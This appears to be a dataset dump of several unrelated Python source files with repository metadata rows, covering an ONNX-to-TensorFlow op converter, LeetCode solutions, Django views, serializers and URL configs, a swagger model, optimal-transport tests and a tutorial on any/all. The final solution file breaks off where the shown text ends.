sequence_lens = tf_layers_dict[graph_node_input_2.name]['tf_node'] \
if isinstance(graph_node_input_2, gs.Variable) else graph_node_input_2
graph_node_output: gs.Variable = graph_node.outputs[0]
shape = graph_node_output.shape
dtype = graph_node_output.dtype
batch_axis = graph_node.attrs.get('batch_axis', 1)
time_axis = graph_node.attrs.get('time_axis', 0)
# Preserving Graph Structure (Dict)
tf_layers_dict[graph_node_output.name] = {
'optype': graph_node.op,
'shape': shape,
'dtype': dtype,
}
# Pre-process transpose
input_tensor = pre_process_transpose(
value_before_transpose=input_tensor,
param_target='inputs',
param_name=graph_node.inputs[0].name,
**kwargs,
)
# Generation of TF OP
tf_layers_dict[graph_node_output.name]['tf_node'] = \
tf.reverse_sequence(
input=input_tensor,
seq_lengths=sequence_lens,
seq_axis=time_axis,
batch_axis=batch_axis,
name=graph_node.name,
)
# Post-process transpose
tf_layers_dict[graph_node_output.name]['tf_node'] = post_process_transpose(
value_before_transpose=tf_layers_dict[graph_node_output.name]['tf_node'],
param_target='outputs',
param_name=graph_node.outputs[0].name,
**kwargs,
)
# Generation of Debug Info
tf_layers_dict[graph_node_output.name]['tf_node_info'] = \
make_tf_node_info(
node_info={
'tf_op_type': tf.reverse_sequence,
'tf_inputs': {
'input': input_tensor,
'seq_lengths': sequence_lens,
'seq_axis': time_axis,
'batch_axis': batch_axis,
},
'tf_outputs': {
'output': tf_layers_dict[graph_node_output.name]['tf_node'],
},
}
)
|
[
"[email protected]"
] | |
979b699a367d604f9353cf9805004d4f0d43b7c5
|
966280ab617298a3ced79bc60189b301c795067a
|
/Sliding-Window/239_sliding_window_maximum.py
|
445ece104ef138fc8ad1d83b3627505908fe52ce
|
[] |
no_license
|
Rishabhh/LeetCode-Solutions
|
c0382e5ba5b77832322c992418f697f42213620f
|
2536744423ee9dc7da30e739eb0bca521c216f00
|
refs/heads/master
| 2020-06-10T02:37:42.103289 | 2019-05-29T06:38:02 | 2019-05-29T06:38:02 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 569 |
py
|
import collections
class Solution:
def max_sliding_window(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: List[int]
"""
res = []
q = collections.deque()
n = len(nums)
for i in range(n):
while q and q[-1][1] <= nums[i]:
q.pop()
q.append((i, nums[i]))
if i >= k:
while q and q[0][0] <= i - k:
q.popleft()
if i >= k - 1:
res.append(q[0][1])
return res
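# Worked example (added for illustration):
# Solution().max_sliding_window([1, 3, -1, -3, 5, 3, 6, 7], 3)
# -> [3, 3, 5, 5, 6, 7]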
|
[
"[email protected]"
] | |
c16526cc565c48f7f41dbc963e284d4f5ce44160
|
3e1fcf34eae508a3f3d4668edfb334069a88db3d
|
/court_scraper/configs.py
|
3c97d17d3c3bde34e18c1f667fb59a09be10a102
|
[
"ISC"
] |
permissive
|
mscarey/court-scraper
|
26d32cb7354b05bb5d5d27a55bf4042e5dde1a4d
|
e29135331526a11aa5eb0445a9223fc3f7630895
|
refs/heads/main
| 2023-07-14T20:23:33.488766 | 2020-08-31T14:02:19 | 2020-08-31T14:02:19 | 384,977,976 | 0 | 0 |
ISC
| 2021-07-11T15:04:57 | 2021-07-11T15:04:57 | null |
UTF-8
|
Python
| false | false | 539 |
py
|
import os
from pathlib import Path
class Configs:
def __init__(self):
try:
self.cache_dir = os.environ['COURT_SCRAPER_DIR']
except KeyError:
self.cache_dir = str(
Path(os.path.expanduser('~'))\
.joinpath('.court-scraper')
)
self.config_file_path = str(
Path(self.cache_dir)\
.joinpath('config.yaml')
)
self.db_path = str(
Path(self.cache_dir)\
.joinpath('cases.db')
)
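# Example usage (illustrative; the cache directory falls back to
# ~/.court-scraper unless COURT_SCRAPER_DIR is set):
# configs = Configs()
# configs.db_path  # e.g. '/home/user/.court-scraper/cases.db'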
|
[
"[email protected]"
] | |
a94d4f6646875930d94d09068b21013e8e11c0b4
|
19d47d47c9614dddcf2f8d744d883a90ade0ce82
|
/pynsxt/swagger_client/models/app_info_host_vm_list_in_csv_format.py
|
c68bd8aec7c8d133e43bc961f5b83387b9a11720
|
[] |
no_license
|
darshanhuang1/pynsxt-1
|
9ed7c0da9b3a64e837a26cbbd8b228e811cee823
|
fb1091dff1af7f8b8f01aec715682dea60765eb8
|
refs/heads/master
| 2020-05-25T14:51:09.932853 | 2018-05-16T12:43:48 | 2018-05-16T12:43:48 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,356 |
py
|
# coding: utf-8
"""
NSX API
VMware NSX REST API # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from swagger_client.models.app_info_host_vm_csv_record import AppInfoHostVmCsvRecord # noqa: F401,E501
from swagger_client.models.csv_list_result import CsvListResult # noqa: F401,E501
class AppInfoHostVmListInCsvFormat(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'file_name': 'str',
'results': 'list[AppInfoHostVmCsvRecord]'
}
attribute_map = {
'file_name': 'file_name',
'results': 'results'
}
def __init__(self, file_name=None, results=None): # noqa: E501
"""AppInfoHostVmListInCsvFormat - a model defined in Swagger""" # noqa: E501
self._file_name = None
self._results = None
self.discriminator = None
if file_name is not None:
self.file_name = file_name
if results is not None:
self.results = results
@property
def file_name(self):
"""Gets the file_name of this AppInfoHostVmListInCsvFormat. # noqa: E501
File name set by HTTP server if API returns CSV result as a file. # noqa: E501
:return: The file_name of this AppInfoHostVmListInCsvFormat. # noqa: E501
:rtype: str
"""
return self._file_name
@file_name.setter
def file_name(self, file_name):
"""Sets the file_name of this AppInfoHostVmListInCsvFormat.
File name set by HTTP server if API returns CSV result as a file. # noqa: E501
:param file_name: The file_name of this AppInfoHostVmListInCsvFormat. # noqa: E501
:type: str
"""
self._file_name = file_name
@property
def results(self):
"""Gets the results of this AppInfoHostVmListInCsvFormat. # noqa: E501
List of applications discovered during an application discovery session # noqa: E501
:return: The results of this AppInfoHostVmListInCsvFormat. # noqa: E501
:rtype: list[AppInfoHostVmCsvRecord]
"""
return self._results
@results.setter
def results(self, results):
"""Sets the results of this AppInfoHostVmListInCsvFormat.
List of applications discovered during an application discovery session # noqa: E501
:param results: The results of this AppInfoHostVmListInCsvFormat. # noqa: E501
:type: list[AppInfoHostVmCsvRecord]
"""
self._results = results
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, AppInfoHostVmListInCsvFormat):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"[email protected]"
] | |
6f1ce69f66b79c11989426517bab38e317a3e9f1
|
0b63f38c7fb468e478e5be82c685de1b7ddb87e5
|
/meiduo/meiduo_mall/meiduo_mall/apps/goods/serializers.py
|
5f87ef206f4094af198abe31f08914950ba75438
|
[
"MIT"
] |
permissive
|
Highsir/Simplestore
|
fcf5ef81a754604c0953a3c1433a7bc09290c121
|
5fc4d9930b0cd1e115f8c6ebf51cd9e28922d263
|
refs/heads/master
| 2020-09-01T07:55:45.362457 | 2019-11-01T04:55:48 | 2019-11-01T04:55:48 | 218,913,913 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,025 |
py
|
from drf_haystack.serializers import HaystackSerializer
from rest_framework import serializers
from goods.models import GoodsCategory, GoodsChannel, SKU
from goods.search_indexes import SKUIndex
class CategorySerializer(serializers.ModelSerializer):
"""类别序列化器"""
class Meta:
model = GoodsCategory
fields = ('id','name')
class ChannelSerializer(serializers.ModelSerializer):
"""频道序列化器"""
category = CategorySerializer
class Meta:
model = GoodsChannel
fields = ('category','url')
class SKUSerializer(serializers.ModelSerializer):
"""
序列化器输出商品sku信息
"""
class Meta:
# Output: the serialized fields
model = SKU
fields = ('id','name','price','default_image_url','comments')
class SKUIndexSerializer(HaystackSerializer):
"""SKU索引结果数据序列化器"""
class Meta:
index_classes = [SKUIndex]
fields = ('text', 'id', 'name', 'price', 'default_image_url', 'comments')
|
[
"[email protected]"
] | |
1979d64a1540d510194a1064ab3dd19ceaa3585b
|
b511bcf3b3c8724a321caa95f381956f56c81197
|
/collective/wpadmin/widgets/draft.py
|
c1c4dd4bfba27029e4bbf9f9d56d38ede2eb8eca
|
[] |
no_license
|
toutpt/collective.wpadmin
|
6957f8fadd5f62a12e4b5cd3eb40794874712cea
|
b5f2384ff2421f1529f7f844d75c1cb4073ac959
|
refs/heads/master
| 2016-08-05T00:30:36.097097 | 2013-01-18T10:37:26 | 2013-01-18T10:37:26 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 755 |
py
|
from zope import component
from plone import api
from plone.registry.interfaces import IRegistry
from collective.wpadmin.widgets import widget
from collective.wpadmin import i18n
_ = i18n.messageFactory
class Draft(widget.Widget):
name = "draft"
title = _(u"Draft")
content_template_name = "draft.pt"
def get_drafts(self):
registry = component.getUtility(IRegistry)
key = 'collective.wpadmin.settings.WPAdminSettings.blog_type'
post_type = registry.get(key, 'News Item')
query = self.get_query()
query['review_state'] = 'private'
query['Creator'] = api.user.get_current().getId()
query['portal_type'] = post_type
brains = self.query_catalog(query)
return brains
|
[
"[email protected]"
] | |
00766e298a33dcae5f92d7859cc87d876ccca112
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2463/60782/304860.py
|
a0914fcd8b479f7c6f75f9999f2477a83b960f6a
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,154 |
py
|
"""
题目描述
给定一个已按照升序排列 的有序数组,找到两个数使得它们相加之和等于目标数。
函数应该返回这两个下标值 index1 和 index2,其中 index1 必须小于 index2。
说明:
返回的下标值(index1 和 index2)不是从零开始的。
你可以假设每个输入只对应唯一的答案,而且你不可以重复使用相同的元素。
"""
class Solution(object):
def twoSum(self, numbers, target):
"""
:type numbers: List[int]
:type target: int
:rtype: List[int]
"""
dic = {}
li = []
for i in range(len(numbers)):
if numbers[i] in dic.keys():
# Append the indices of the stored value and the current value to li
li.append(dic[numbers[i]] + 1) # index of the earlier value
li.append(i + 1) # index of its complement
return li
# Store each value's complement and the corresponding index in the dict
dic[target - numbers[i]] = i
return None
s = Solution()
print(s.twoSum(list(map(int, input().split(", "))), int(input())))
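# Worked example (added for illustration): entering "2, 7, 11, 15" and
# then "9" prints [1, 2] -- the 1-based indices of 2 and 7.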
|
[
"[email protected]"
] | |
a9003fdff24c89d3d9fa50bcfc64c24a0cc79586
|
a24a03163cf643249922edc29bc2086517615e53
|
/thewema/urls.py
|
7bcf11a899a1294d7c8cbb12dff05605f0faab60
|
[] |
no_license
|
ErickMwazonga/The-Wema-Academy
|
165203e8e337459f6bae4f7178b3bfad715f052a
|
61f9b778e423326d8dbd2c04f2dd6ce19e15e2a9
|
refs/heads/master
| 2021-01-19T14:22:00.568982 | 2017-04-13T10:41:06 | 2017-04-13T10:41:06 | 88,153,833 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,004 |
py
|
"""wema URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from . import views
from django.contrib.auth import views as auth_views
from django.contrib.auth.forms import AuthenticationForm
app_name = 'thewema'
urlpatterns = [
# url(r'^$', views.index_view, name='index'),
url(r'^$', views.IndexView.as_view(), name='index'),
url(r'^students$', views.StudentListView.as_view(), name='students'),
url(r'^student$', views.StudentCreateView.as_view(), name='student'),
url(r'^student/(?P<pk>[0-9]+)/$', views.StudentDetailView.as_view(), name='student_detail'),
url(r'^class$', views.StudentClassCreateView.as_view(), name='sclass'),
url(r'^classes$', views.StudentClassListView.as_view(), name='classes'),
url(r'^exam$', views.ExamCreateView.as_view(), name='exam'),
url(r'^score$', views.ScoreCreateView.as_view(), name='score'),
url(r'^scores$', views.ScoreListView.as_view(), name='scores'),
url(r'^scores/(?P<pk>[0-9]+)/$', views.ScoreDetailView.as_view(), name='score_detail'),
url(r'^feedback$', views.FeedbackCreateView.as_view(), name='feedback'),
url(r'^login$', auth_views.login, {
'template_name': 'thewema/login.html',
'authentication_form': AuthenticationForm
},
name='login'
),
url(r'^logout/$', auth_views.logout_then_login, {'login_url': 'thewema:login'}, name='logout'),
]
|
[
"[email protected]"
] | |
bd0ba877cb6b849000ce9ea154a7506ab94dbb97
|
2d735cd72f1b2a17e58397a1214d3bcc2b8f113f
|
/PYTHON_FUNCTIONS/any_all_in_python.py
|
c4e84d22e60c5fd4da0ce9f654e5655dd7651839
|
[] |
no_license
|
shubhamrocks888/python
|
3b95b5b53be8e0857efe72b8797e01e959d230f4
|
7313ddd0d09a0b478df928a07a6094930b597132
|
refs/heads/master
| 2022-12-15T00:03:40.261942 | 2020-08-29T18:00:42 | 2020-08-29T18:00:42 | 279,280,400 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,812 |
py
|
Truth table:
                                     any      all
All true values                      True     True
All false values                     False    False
One True (all others False)         True     False
One False (all others True)         True     False
Empty                                False    True
## any and all are two built-ins provided in Python, used for successive Or/And operations.
'''Any'''
Returns True if any of the items is True. It returns False if the iterable is empty or all items are False.
any() can be thought of as a sequence of OR operations on the provided iterable.
It short-circuits the execution, i.e. stops as soon as the result is known.
Syntax : any(iterable)
# Since all are false, false is returned
print (any([False, False, False, False])) # Output: False
# Here the method will short-circuit at the
# second item (True) and will return True.
print (any([False, True, False, False])) # Output: True
# Here the method will short-circuit at the
# first (True) and will return True.
print (any([True, False, False, False])) # Output: True
'''All'''
Returns True if all of the items are True (or if the iterable is empty). all() can be thought
of as a sequence of AND operations on the provided iterable. It also short-circuits the
execution, i.e. stops as soon as the result is known.
Syntax : all(iterable)
# Here all the iterables are True so all
# will return True and the same will be printed
print (all([True, True, True, True])) # Output: True
# Here the method will short-circuit at the
# first item (False) and will return False.
print (all([False, True, True, False])) # Output: False
# This statement will return False, as no
# True is found in the iterables
print (all([False, False, False])) # Output: False
Practical Examples:
# This code explains how can we
# use 'any' function on list
list1 = []
list2 = []
# Index ranges from 1 to 10 to multiply
for i in range(1,11):
list1.append(4*i)
# Index to access the list2 is from 0 to 9
for i in range(0,10):
list2.append(list1[i]%5==0)
print('See whether at least one number is divisible by 5 in list 1=>')
print(any(list2))
Output:
See whether at least one number is divisible by 5 in list 1=>
True
# Illustration of 'all' function in python 3
# Take two lists
list1=[]
list2=[]
# All numbers in list1 are in form: 4*i-3
for i in range(1,21):
list1.append(4*i-3)
# list2 stores info of odd numbers in list1
for i in range(0,20):
list2.append(list1[i]%2==1)
print('See whether all numbers in list1 are odd =>')
print(all(list2))
Output:
See whether all numbers in list1 are odd =>
True
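Both functions also accept generator expressions, which keeps the
short-circuiting lazy (a small added illustration):
nums = [3, 5, 8, 11]
print(any(n % 2 == 0 for n in nums)) # Output: True (stops at 8)
print(all(n > 0 for n in nums)) # Output: True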
|
[
"[email protected]"
] | |
c22f8acacd79b8afcf53558dbd03b826832af27a
|
8580fd92512c236deae692d155bdb5eab2e00508
|
/DarkTrails/asgi.py
|
7b723533039a12cf02182a7076964bb2881d83f3
|
[] |
no_license
|
JackSnowdon/DownDT
|
d5d7f04acf92b5102cf67c5aa70cda2ebc4062fd
|
17924b0b64da39d29c892fee4c7746d09b76fd8c
|
refs/heads/master
| 2023-04-01T00:25:16.382696 | 2021-03-28T16:19:26 | 2021-03-28T16:19:26 | 352,373,320 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 397 |
py
|
"""
ASGI config for DarkTrails project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'DarkTrails.settings')
application = get_asgi_application()
|
[
"[email protected]"
] | |
8b23a3fffb6859b0622210f0f50699c660b3ef3f
|
50ee2f4f1a7d2e5ff7ac35118c5ac45f9b923865
|
/0x01-python-if_else_loops_functions/1-last_digit.py
|
c7b28ae9d733661962aa47ddbb2e987589ebc1b4
|
[] |
no_license
|
spencerhcheng/holbertonschool-higher_level_programming
|
b489fbe8eba6109ef1eaa0d9363f3477e7eb16c4
|
f8e1dbc24fcf8fb40ca135d2700872eb773e481e
|
refs/heads/master
| 2021-01-20T06:54:35.044899 | 2018-05-20T05:09:59 | 2018-05-20T05:09:59 | 89,943,332 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 380 |
py
|
#!/usr/bin/python3
import random
number = random.randint(-10000, 10000)
if number > 0:
lastNum = number % 10
elif number <= 0:
lastNum = number % -10
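# Note: a negative modulus keeps the sign, e.g. -47 % -10 == -7, so
# lastNum carries the sign of the original number.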
print('Last digit of {:d} is {:d}'.format(number, lastNum), end=" ")
if lastNum > 5:
print('and is greater than 5')
elif lastNum == 0:
print('and is 0')
elif lastNum < 6:
print('and is less than 6 and not 0')
|
[
"[email protected]"
] | |
6aaadd38872c563c7e3b4fd9a31a6d2edfb79945
|
41b73ecc4fa00a58609c1c3b8e717bbbc13cdee6
|
/test/test_all.py
|
d7bd3837fc94c5de55e932b9801ad5547ef409f3
|
[] |
no_license
|
ahwillia/sinkdiv
|
70c2f689af43cf80dd8c3951199885f3792d9ac3
|
85bd51f369855b78e5c0e1d5bb2aa8928d85c428
|
refs/heads/master
| 2023-01-31T10:56:08.481608 | 2020-12-18T04:41:26 | 2020-12-18T04:41:26 | 298,928,192 | 4 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,364 |
py
|
import pytest
import numpy as np
from numpy.testing import assert_allclose
from sinkdiv import OTCost, ForwardKL, Balanced
from scipy.optimize import approx_fprime
def test_entropy_increases(make_fig=False):
"""
Check that increasing epsilon increases blur in the
transport plan.
"""
epsilons = (0.01, 0.1, 1.0)
margdiv = ForwardKL(1.0)
x = np.linspace(-4, 4, 51)[:, None]
y = np.linspace(-4, 4, 50)[:, None]
a = np.squeeze(np.exp(-x ** 2))
b = np.squeeze(np.exp(-y ** 2))
a /= np.sum(a)
b /= np.sum(b)
# Fit transport plans.
plans = []
for eps in epsilons:
plans.append(
OTCost(margdiv, eps, 1e-6).fit(a, x, b, y).P_
)
# Test that the entropy of the optimal plan increases.
entropies = [np.sum(-P * np.log(P + 1e-10) - P + 1) for P in plans]
assert np.all(np.diff(entropies) > 0)
if make_fig:
import matplotlib.pyplot as plt
fig, axes = plt.subplots(1, 3, sharey=True, sharex=True)
for P, eps, ax in zip(plans, epsilons, axes):
ax.imshow(P, aspect="auto")
ax.set_title("eps = {}".format(eps))
fig.set_size_inches((4, 2))
fig.tight_layout()
plt.show()
# @pytest.mark.parametrize('eps', [0.01, 0.1, 1.0])
# @pytest.mark.parametrize('tol', [1e-6])
# def test_balanced_duality_gap(eps, tol):
# """
# Check agreement between primal and dual objectives,
# balanced transport case.
# """
# np.random.seed(1234)
# margdiv = Balanced()
# x = np.linspace(-4, 4, 51)[:, None]
# y = np.linspace(-4, 4, 50)[:, None]
# a = np.squeeze(np.exp(-x ** 2))
# b = np.squeeze(np.exp(-y ** 2))
# a /= a.sum()
# b /= b.sum()
# ot = OTCost(margdiv, eps, tol).fit(a, x, b, y)
# assert_allclose(ot.primal_obj_, ot.dual_obj_, atol=1e-3)
@pytest.mark.parametrize('seed', [123])
@pytest.mark.parametrize('eps', [1.0])
@pytest.mark.parametrize('lam', [1000]) # <-- !! currently works for large lam, but not small !!
@pytest.mark.parametrize('b_mass', [1.0])
@pytest.mark.parametrize('tol', [1e-6])
def test_reference_implementation(seed, eps, lam, b_mass, tol):
"""
Compare the transport plan to the Python Optimal Transport (POT)
library's reference implementation.
"""
from ot.unbalanced import sinkhorn_stabilized_unbalanced
rs = np.random.RandomState(seed)
# Random locations for atoms.
x = rs.randn(25, 1)
y = rs.randn(24, 1)
# Random mass vectors.
a = np.random.rand(x.size)
b = np.random.rand(y.size)
# Normalize masses.
a *= (1.0 / a.sum())
b *= (b_mass / b.sum())
# Fit OTCost, get transport plan
margdiv = ForwardKL(lam)
otcost = OTCost(margdiv, eps, tol).fit(a, x, b, y)
# Fit with reference library.
transport_plan = sinkhorn_stabilized_unbalanced(
a, b, otcost.C_, eps, lam, numItermax=10000
)
# Assert optimal transport plans match.
assert_allclose(otcost.P_, transport_plan, atol=1e-5, rtol=1e-2)
@pytest.mark.parametrize('seed', [123])
@pytest.mark.parametrize('tol', [1e-6])
@pytest.mark.parametrize('eps', [1e-6])
def test_zero_cost(seed, eps, tol):
"""
Assert cost is zero if epsilon and lambda penalties are both very small.
In this case, an optimal transport plan could just be the zeros matrix.
"""
rs = np.random.RandomState(seed)
# Random locations for atoms.
x = rs.randn(25, 1)
y = rs.randn(24, 1)
# Random mass vectors.
a = np.random.rand(x.size)
b = np.random.rand(y.size)
# Normalize masses.
a *= (1.0 / a.sum())
b *= (1.0 / b.sum())
# Fit model with very small marginal penalty
margdiv = ForwardKL(1e-6)
otcost = OTCost(margdiv, eps, tol).fit(a, x, b, y)
# Assert cost is essentially zero.
assert_allclose(otcost.primal_obj_, 0.0, atol=1e-5)
assert_allclose(otcost.dual_obj_, 0.0, atol=1e-5)
@pytest.mark.parametrize('seed', [123])
@pytest.mark.parametrize('eps', [0.1, 1.0, 10])
@pytest.mark.parametrize('lam', [0.1, 1.0, 10])
@pytest.mark.parametrize('b_mass', [0.5, 1.0, 2.0])
@pytest.mark.parametrize('tol', [1e-6])
def test_unbalanced_kl_duality_gap(seed, eps, lam, b_mass, tol):
"""
Check agreement between the primal and dual objectives in the
unbalanced (forward-KL) case.
"""
rs = np.random.RandomState(seed)
# Random locations for atoms.
x = rs.randn(25, 1)
y = rs.randn(24, 1)
# Random mass vectors.
a = np.random.rand(x.size)
b = np.random.rand(y.size)
# Normalize masses.
a *= (1.0 / a.sum())
b *= (b_mass / b.sum())
# Calculate OT cost.
margdiv = ForwardKL(lam)
otcost = OTCost(margdiv, eps, tol).fit(a, x, b, y)
# Duality gap should be small.
assert_allclose(otcost.primal_obj_, otcost.dual_obj_, atol=1e-4)
@pytest.mark.parametrize('seed', [123, 1234])
@pytest.mark.parametrize('eps', [0.1, 1.0, 10])
@pytest.mark.parametrize('lam', [0.1, 1.0, 10])
@pytest.mark.parametrize('b_mass', [0.5, 1.0, 2.0])
@pytest.mark.parametrize('tol', [1e-6])
def test_ot_kl_gradients(seed, eps, lam, b_mass, tol):
"""
Check the analytic gradients of the OT cost with respect to the
mass vectors against finite differences.
"""
rs = np.random.RandomState(seed)
# Random locations for atoms.
x = rs.randn(25, 1)
y = rs.randn(24, 1)
# Random mass vectors.
a = np.random.rand(x.size)
b = np.random.rand(y.size)
# Normalize masses.
a *= (1.0 / a.sum())
b *= (b_mass / b.sum())
# Calculate OT cost.
margdiv = ForwardKL(lam)
otcost = OTCost(margdiv, eps, tol)
# Fit OT cost, compute gradients for a and b.
otcost.fit(a, x, b, y)
grad_a = otcost.grad_a_.copy()
grad_b = otcost.grad_b_.copy()
# Compute gradient of a by finite differencing.
def f(a_):
otcost.fit(a_, x, b, y)
return otcost.primal_obj_
approx_grad_a = approx_fprime(a, f, np.sqrt(np.finfo(float).eps))
# Check gradients approximately match finite differencing.
assert_allclose(grad_a, approx_grad_a, atol=1e-4, rtol=1e-3)
# Function to compute otcost given mass vector b.
def g(b_):
otcost.fit(a, x, b_, y)
return otcost.primal_obj_
approx_grad_b = approx_fprime(b, g, np.sqrt(np.finfo(float).eps))
# Check gradients approximately match finite differencing.
assert_allclose(grad_b, approx_grad_b, atol=1e-4, rtol=1e-3)
|
[
"[email protected]"
] | |
6aca78d446a771d1bdc8bb31bbbc2bb778bacfba
|
206c10808b6224f7d8236e27cc555e723af695d9
|
/tests/test_empty_service.py
|
8ab14bce925b0271890c48c84c359ad361d40e51
|
[
"MIT"
] |
permissive
|
xdmiodz/tomodachi
|
3280209ae49100ec902e3b15c323b38e7480cdd3
|
7ca998a421dd724df5967d5baa0cf79f5112b79b
|
refs/heads/master
| 2023-03-15T19:22:16.381212 | 2023-01-20T07:34:48 | 2023-01-20T07:34:48 | 200,020,833 | 0 | 2 |
MIT
| 2023-03-08T00:00:01 | 2019-08-01T09:30:22 |
Python
|
UTF-8
|
Python
| false | false | 674 |
py
|
from typing import Any
from run_test_service_helper import start_service
def test_empty_service(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/empty_service.py", monkeypatch)
loop.run_until_complete(future)
out, err = capsys.readouterr()
assert "No transports defined in service file" in err
def test_non_decorated_service(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/non_decorated_service.py", monkeypatch)
loop.run_until_complete(future)
out, err = capsys.readouterr()
assert "No transports defined in service file" in err
|
[
"[email protected]"
] | |
cfb9ff1a1089622084ea929a8ceebf87da9d0687
|
45799ccc3a16c785ab3c65f3296d66f8463590dc
|
/docs/_downloads/b9951f29cd54bc08237c8fb75b9c2476/q1314.py
|
b487939c8e11b9a0513ff9639257664f5e82d07a
|
[
"MIT"
] |
permissive
|
odys-z/hello
|
9d29b7af68ea8c490b43994cf16d75c0e8ace08e
|
fedd0aec7273f3170aa77316d0d5f317cc18a979
|
refs/heads/master
| 2023-08-19T03:25:58.684050 | 2023-08-18T08:07:27 | 2023-08-18T08:07:27 | 154,006,292 | 0 | 0 |
MIT
| 2023-04-18T22:50:56 | 2018-10-21T12:34:12 |
C++
|
UTF-8
|
Python
| false | false | 2,347 |
py
|
'''
1314. Matrix Block Sum
https://leetcode.com/problems/matrix-block-sum/
Given a m * n matrix mat and an integer K, return a matrix answer where each answer[i][j] is
the sum of all elements mat[r][c] for i - K <= r <= i + K, j - K <= c <= j + K, and (r, c)
is a valid position in the matrix.
Example 1:
Input: mat = [[1,2,3],[4,5,6],[7,8,9]], K = 1
Output: [[12,21,16],[27,45,33],[24,39,28]]
Example 2:
Input: mat = [[1,2,3],[4,5,6],[7,8,9]], K = 2
Output: [[45,45,45],[45,45,45],[45,45,45]]
Constraints:
m == mat.length
n == mat[i].length
1 <= m, n, K <= 100
1 <= mat[i][j] <= 100
Hint 1:
How to calculate the required sum for a cell (i,j) fast ?
Hint 2:
Use the concept of cumulative sum array.
Hint 3:
Create a cumulative sum matrix where dp[i][j] is the sum of all cells in the rectangle
from (0,0) to (i,j), use inclusion-exclusion idea.
'''
from unittest import TestCase
from typing import List
class Solution:
    '''
    Runtime beats ~70.85% of LeetCode submissions.
    '''
def matrixBlockSum(self, mat: List[List[int]], K: int) -> List[List[int]]:
# dp
m, n = len(mat), len(mat[0])
dp = [[0] * (n+K) for _ in range(m+K)]
for r in range(m):
dp[r][0] = mat[r][0]
for c in range(1, n+K):
if c < n:
dp[r][c] = mat[r][c] + dp[r][c-1]
else:
dp[r][c] = dp[r][c-1]
for c in range(n+K):
for r in range(1, m+K):
if r < m:
dp[r][c] += dp[r-1][c]
else:
dp[r][c] = dp[r-1][c]
for r in range(m):
for c in range(n):
mat[r][c] = dp[r+K][c+K]
if 0 <= r - K - 1:
mat[r][c] -= dp[r-K-1][c+K]
if 0 <= c - K - 1:
mat[r][c] -= dp[r+K][c-K-1]
if 0 <= r - K - 1 and 0 <= c - K - 1:
mat[r][c] += dp[r-K-1][c-K-1]
return mat
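# Alternative sketch (added, not part of the original submission): the same
# inclusion-exclusion idea via the conventional (m+1) x (n+1) padded prefix
# sum, returning a fresh matrix instead of overwriting `mat`. The helper name
# `matrix_block_sum_prefix` is ours, chosen for illustration only.
def matrix_block_sum_prefix(mat: List[List[int]], K: int) -> List[List[int]]:
    m, n = len(mat), len(mat[0])
    # pre[i][j] holds the sum of the rectangle (0, 0)..(i - 1, j - 1).
    pre = [[0] * (n + 1) for _ in range(m + 1)]
    for r in range(m):
        for c in range(n):
            pre[r + 1][c + 1] = mat[r][c] + pre[r][c + 1] + pre[r + 1][c] - pre[r][c]
    ans = [[0] * n for _ in range(m)]
    for r in range(m):
        for c in range(n):
            # Clip the K-neighborhood to the matrix, then apply
            # inclusion-exclusion on the padded prefix sums.
            r1, c1 = max(0, r - K), max(0, c - K)
            r2, c2 = min(m, r + K + 1), min(n, c + K + 1)
            ans[r][c] = pre[r2][c2] - pre[r1][c2] - pre[r2][c1] + pre[r1][c1]
    return ans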
if __name__ == '__main__':
t = TestCase()
s = Solution()
    # assertEqual checks row order as well; assertCountEqual would accept a
